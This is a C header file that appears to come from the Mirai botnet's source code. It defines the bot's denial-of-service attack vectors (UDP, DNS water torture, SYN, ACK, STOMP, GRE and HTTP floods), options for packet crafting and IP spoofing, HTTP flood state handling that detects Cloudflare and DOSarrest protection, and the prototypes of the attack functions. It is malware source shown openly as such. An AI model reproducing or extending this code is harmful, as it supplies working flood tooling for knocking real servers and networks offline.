#pragma once #include #include #include #include #include #include "includes.h" #include "protocol.h" #define ATTACK_CONCURRENT_MAX 8 #ifdef DEBUG #define HTTP_CONNECTION_MAX 1000 #else #define HTTP_CONNECTION_MAX 256 #endif struct attack_target { struct sockaddr_in sock_addr; ipv4_t addr; uint8_t netmask; }; struct attack_option { char *val; uint8_t key; }; typedef void (*ATTACK_FUNC) (uint8_t, struct attack_target *, uint8_t, struct attack_option *); typedef uint8_t ATTACK_VECTOR; #define ATK_VEC_UDP 0 /* Straight up UDP flood */ #define ATK_VEC_VSE 1 /* Valve Source Engine query flood */ #define ATK_VEC_DNS 2 /* DNS water torture */ #define ATK_VEC_SYN 3 /* SYN flood with options */ #define ATK_VEC_ACK 4 /* ACK flood */ #define ATK_VEC_STOMP 5 /* ACK flood to bypass mitigation devices */ #define ATK_VEC_GREIP 6 /* GRE IP flood */ #define ATK_VEC_GREETH 7 /* GRE Ethernet flood */ //#define ATK_VEC_PROXY 8 /* Proxy knockback connection */ #define ATK_VEC_UDP_PLAIN 9 /* Plain UDP flood optimized for speed */ #define ATK_VEC_HTTP 10 /* HTTP layer 7 flood */ #define ATK_OPT_PAYLOAD_SIZE 0 // What should the size of the packet data be? #define ATK_OPT_PAYLOAD_RAND 1 // Should we randomize the packet data contents? #define ATK_OPT_IP_TOS 2 // tos field in IP header #define ATK_OPT_IP_IDENT 3 // ident field in IP header #define ATK_OPT_IP_TTL 4 // ttl field in IP header #define ATK_OPT_IP_DF 5 // Dont-Fragment bit set #define ATK_OPT_SPORT 6 // Should we force a source port? (0 = random) #define ATK_OPT_DPORT 7 // Should we force a dest port? (0 = random) #define ATK_OPT_DOMAIN 8 // Domain name for DNS attack #define ATK_OPT_DNS_HDR_ID 9 // Domain name header ID //#define ATK_OPT_TCPCC 10 // TCP congestion control #define ATK_OPT_URG 11 // TCP URG header flag #define ATK_OPT_ACK 12 // TCP ACK header flag #define ATK_OPT_PSH 13 // TCP PSH header flag #define ATK_OPT_RST 14 // TCP RST header flag #define ATK_OPT_SYN 15 // TCP SYN header flag #define ATK_OPT_FIN 16 // TCP FIN header flag #define ATK_OPT_SEQRND 17 // Should we force the sequence number? (TCP only) #define ATK_OPT_ACKRND 18 // Should we force the ack number? (TCP only) #define ATK_OPT_GRE_CONSTIP 19 // Should the encapsulated destination address be the same as the target? #define ATK_OPT_METHOD 20 // Method for HTTP flood #define ATK_OPT_POST_DATA 21 // Any data to be posted with HTTP flood #define ATK_OPT_PATH 22 // The path for the HTTP flood #define ATK_OPT_HTTPS 23 // Is this URL SSL/HTTPS? #define ATK_OPT_CONNS 24 // Number of sockets to use #define ATK_OPT_SOURCE 25 // Source IP struct attack_method { ATTACK_FUNC func; ATTACK_VECTOR vector; }; struct attack_stomp_data { ipv4_t addr; uint32_t seq, ack_seq; port_t sport, dport; }; #define HTTP_CONN_INIT 0 // Inital state #define HTTP_CONN_RESTART 1 // Scheduled to restart connection next spin #define HTTP_CONN_CONNECTING 2 // Waiting for it to connect #define HTTP_CONN_HTTPS_STUFF 3 // Handle any needed HTTPS stuff such as negotiation #define HTTP_CONN_SEND 4 // Sending HTTP request #define HTTP_CONN_SEND_HEADERS 5 // Send HTTP headers #define HTTP_CONN_RECV_HEADER 6 // Get HTTP headers and check for things like location or cookies etc #define HTTP_CONN_RECV_BODY 7 // Get HTTP body and check for cf iaua mode #define HTTP_CONN_SEND_JUNK 8 // Send as much data as possible #define HTTP_CONN_SNDBUF_WAIT 9 // Wait for socket to be available to be written to #define HTTP_CONN_QUEUE_RESTART 10 // restart the connection/send new request BUT FIRST read any other available data. #define HTTP_CONN_CLOSED 11 // Close connection and move on #define HTTP_RDBUF_SIZE 1024 #define HTTP_HACK_DRAIN 64 #define HTTP_PATH_MAX 256 #define HTTP_DOMAIN_MAX 128 #define HTTP_COOKIE_MAX 5 // no more then 5 tracked cookies #define HTTP_COOKIE_LEN_MAX 128 // max cookie len #define HTTP_POST_MAX 512 // max post data len #define HTTP_PROT_DOSARREST 1 // Server: DOSarrest #define HTTP_PROT_CLOUDFLARE 2 // Server: cloudflare-nginx struct attack_http_state { int fd; uint8_t state; int last_recv; int last_send; ipv4_t dst_addr; char user_agent[512]; char path[HTTP_PATH_MAX + 1]; char domain[HTTP_DOMAIN_MAX + 1]; char postdata[HTTP_POST_MAX + 1]; char method[9]; char orig_method[9]; int protection_type; int keepalive; int chunked; int content_length; int num_cookies; char cookies[HTTP_COOKIE_MAX][HTTP_COOKIE_LEN_MAX]; int rdbuf_pos; char rdbuf[HTTP_RDBUF_SIZE]; }; struct attack_cfnull_state { int fd; uint8_t state; int last_recv; int last_send; ipv4_t dst_addr; char user_agent[512]; char domain[HTTP_DOMAIN_MAX + 1]; int to_send; }; BOOL attack_init(void); void attack_kill_all(void); void attack_parse(char *, int); void attack_start(int, ATTACK_VECTOR, uint8_t, struct attack_target *, uint8_t, struct attack_option *); char *attack_get_opt_str(uint8_t, struct attack_option *, uint8_t, char *); int attack_get_opt_int(uint8_t, struct attack_option *, uint8_t, int); uint32_t attack_get_opt_ip(uint8_t, struct attack_option *, uint8_t, uint32_t); /* Actual attacks */ void attack_udp_generic(uint8_t, struct attack_target *, uint8_t, struct attack_option *); void attack_udp_vse(uint8_t, struct attack_target *, uint8_t, struct attack_option *); void attack_udp_dns(uint8_t, struct attack_target *, uint8_t, struct attack_option *); void attack_udp_plain(uint8_t, struct attack_target *, uint8_t, struct attack_option *); void attack_tcp_syn(uint8_t, struct attack_target *, uint8_t, struct attack_option *); void attack_tcp_ack(uint8_t, struct attack_target *, uint8_t, struct attack_option *); void attack_tcp_stomp(uint8_t, struct attack_target *, uint8_t, struct attack_option *); void attack_gre_ip(uint8_t, struct attack_target *, uint8_t, struct attack_option *); void attack_gre_eth(uint8_t, struct attack_target *, uint8_t, struct attack_option *); void attack_app_proxy(uint8_t, struct attack_target *, uint8_t, struct attack_option *); void attack_app_http(uint8_t, struct attack_target *, uint8_t, struct attack_option *); static void add_attack(ATTACK_VECTOR, ATTACK_FUNC); static void free_opts(struct attack_option *, int);